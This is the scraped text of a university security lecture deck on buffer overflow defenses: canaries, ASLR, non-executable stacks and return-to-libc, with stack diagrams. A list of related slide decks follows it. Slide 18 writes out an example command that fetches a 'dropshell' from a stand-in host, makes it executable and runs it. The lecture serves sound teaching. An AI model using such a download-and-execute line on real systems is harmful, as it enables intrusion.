buffer overflow defenses countermeasures
play

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 - PowerPoint PPT Presentation

Aug 01, 2023 •174 likes •1.12k views

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess the raw address)

  1. BUFFER OVERFLOW 
 DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018

  2. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  3. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  4. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 … buffer

  5. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 00 00 00 00 02 8d e2 10 … buffer canary

  6. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  7. DETECTING OVERFLOWS WITH CANARIES %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  8. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary

  9. DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort %eip text ... %eip &arg1 %ebp 0xbdf 00 00 00 00 02 8d e2 10 \x0f \x3c \x2f ... … nop nop nop … buffer canary What value should the canary have?

  10. CANARY VALUES From StackGuard [Wagle & Cowan] 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new random value @ each process start • Save the real value somewhere in memory • Must write-protect the stored value 3. Random XOR canaries • Same as random canaries • But store canary XOR some control info, instead

  11. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 • Getting %eip to point to our code (dist buff to stored eip)

  12. ADDRESS SPACE LAYOUT RANDOMIZATION 4G 0xffffffff Set when 
 cmdline & env process starts int f() { 
 Stack int x; … Runtime Heap malloc(sizeof(long)); Uninit’d data static int x; Known at Init’d data static const int y=10; compile time Text 0 0x00000000 Randomize where exactly these regions start

  13. ADDRESS SPACE LAYOUT RANDOMIZATION Shortcomings of ASLR • Introduces return-to-libc atk • Probes for location of usleep • On 32-bit architectures, 
 only 16 bits of entropy • fork() keeps same offsets

  14. RECALL OUR CHALLENGES How can we make these even more difficult? • Putting code into the memory (no zeroes) 
 Option: Make this detectable with canaries • Finding the return address (guess the raw address) 
 Address Space Layout Randomization ( ASLR ) • Getting %eip to point to our code (dist buff to stored eip)

  15. GETTING %EIP TO POINT TO OUR CODE Recall that all memory has Read, Write, and Execute permissions 4G 0xffffffff cmdline & env Stack Must be 
 But does it 
 readable & 
 need to be 
 writeable executable? Heap Basic idea: 
 Uninit’d data make the stack 
 Init’d data non-executable Must be 
 Text executable 0 0x00000000

  16. RETURN TO LIBC Exploit:

  17. RETURN TO LIBC Exploit: Preferred: strlcpy char buf[4]; 
 strncpy(buf, “hello!”, sizeof(buf)); 
 buf = {‘h’, ‘e’, ‘l’, ‘l’} strlcpy(buf, “hello!”, sizeof(buf)); buf = {‘h’, ‘e’, ‘l’, ‘\0’}

  18. RETURN TO LIBC Exploit: Goal: system(“wget http://www.example.com/dropshell ; 
 chmod +x dropshell ; 
 ./dropshell”); Non-executable stack Challenge: “ system ” already exists somewhere in libc Insight:

  19. RETURN TO LIBC text ... %eip &arg1 %ebp 00 00 00 00 … buffer stack frame %eip

  20. RETURN TO LIBC padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  21. RETURN TO LIBC good 
 guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... buffer stack frame %eip

  22. RETURN TO LIBC good 
 nop sled guess padding text ... %eip &arg1 %ebp 00 00 00 00 … 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  23. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  24. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip

  25. RETURN TO LIBC good 
 nop sled guess padding malicious code text ... %eip &arg1 %ebp 00 00 00 00 … \x0f \x3c \x2f ... 0xbdf 0xbdf 0xbdf ... nop nop nop … buffer stack frame %eip PANIC: address not executable

  26. RETURN TO LIBC libc ... ... ... usleep() printf() system() text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  27. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  28. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding text ... %eip &arg1 %ebp 00 00 00 00 … buffer %eip

  29. RETURN TO LIBC libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  30. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip

  31. RETURN TO LIBC libc ... ... ... usleep() printf() system() How do we guess this address? padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer How do we ensure these are the args? %eip

  32. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  33. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  34. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %esp %ebp leave : mov %ebp %esp pop %ebp ret : pop %eip

  35. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp leave : mov %ebp %esp pop %ebp %esp ret : pop %eip

  36. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %eip %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  37. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  38. ARGUMENTS WHEN WE ARE SMASHING %EBP? libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %eip %esp leave : mov %ebp %esp pop %ebp ret : pop %eip At this point, we can’t reliably access local variables

  39. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  40. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %ebp %esp leave : mov %ebp %esp pop %ebp ret : pop %eip

  41. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

  42. ARGUMENTS WHEN WE ARE SMASHING %EBP? %eip system : pushl %ebp movl %esp, %ebp libc ... ... ... usleep() printf() system() Will expect args at 8(%ebp) padding arguments text ... %eip &arg1 %ebp 00 00 00 00 … wget example.com/... DEADBEEF DEADBEEF buffer %esp %ebp

Recommend

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Last time We finished up By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow defenses (and workarounds) Format string vulnerabilities Integer overflow vulnerabilities This time

1.29k views • 80 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

873 views • 53 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Last time We continued By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow attacks & other vulnerabilities Overflow defenses Everything youve always wanted to know about

2.41k views • 197 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.49k views • 117 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.23k views • 95 slides
Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn

Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn

Buffer Overflow Attacks & Defenses Slides are borrowed from Franziska Roesner @UW and Dawn Song @Berkeley Linux (32-bit) process memory layout -0xFFFFFFFF Reserved for Kernal -0xC0000000 user stack %esp shared libraries -0x40000000

994 views • 85 slides
Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko,

CSE 127: Computer Security Buffer overflow defenses Deian Stefan Some slides adopted from Nadia Heninger, Kirill Levchenko, Stefan Savage, and Stephen Checkoway Today: mitigating buffer overflows Lecture objectives: Understand how to

1.33k views • 130 slides
Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner

Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Autumn 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

234 views • 22 slides
Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner

Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

760 views • 23 slides
Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by the Morris Worm in 1988 Prevention techniques known NX bit, stack canaries, ASLR Still of major concern Recent examples:

354 views • 21 slides
Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer Science Rutgers University http://www.cs.rutgers.edu/~vinodg/416 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red,

950 views • 55 slides
Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

1 Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed in buffer overflow exploits to create backdoors Execution of additional network services via the INETD daemon The addition of new users

497 views • 30 slides
Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material Based on Chapter 11 of the text Outline Buffer Overflow Stack Buffer Overflow Shell

783 views • 28 slides
History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood as early as 1972 Computer Security Technology Planning Study Morris Worm First

1.07k views • 42 slides
CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking & Loading, continued Buffer Overflow Read: CSAPP2: section 3.12: out-of-bounds memory references & buffer overflow K&R:

775 views • 43 slides
Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code Challenges in exploitation Shellcode Countermeasures Program Memory Stack a,b, ptr ptr points to the memory here y x Order of the function

368 views • 36 slides
IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.

221 views • 3 slides
Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Last time We continued By launching our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow fundamentals This time We will finish up By looking at Buffer Overflow overflows

1.33k views • 103 slides
Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format

Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format

Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format layout Buffer Overflow theory Example code Initial Investigation / Assembly Registers Tooling Fuzzing Shellcode /

700 views • 16 slides
VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is Buffer Overflow? Writing data outside of the intended buffer (memory space) SWEN-331:

298 views • 6 slides
More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester

More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester

More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester Rebeiro Indian Institute of Technology Madras Buffer Overreads 2 Buffer Overread Example 3 Buffer Overread Example len read from command line

906 views • 76 slides
Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes & Koen Koning Erik van der Kouwe Herbert Bos Cristiano Giuffrida June 19, 2018 Preview buffer[10] secret 2 Preview buffer[10] secret buffer[5] 2 Preview

934 views • 74 slides
Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow

Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow

CSE350/450 Lehigh University Fall 2016 Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow Shellcode Heap Overflow Format Strings Return-oriented Programming Metasploit 101 Anatomy of the Stack

1.83k views • 124 slides
------------ GOOD LUCK ON THE EXAM ----------------- 1) In Buffer Overflow exploit, which of the

------------ GOOD LUCK ON THE EXAM ----------------- 1) In Buffer Overflow exploit, which of the

------------ GOOD LUCK ON THE EXAM ----------------- 1) In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code? A. EIP B. ESP C. EAP D. EEP Ans: A 2)Which type of scan does not

431 views • 18 slides

More recommend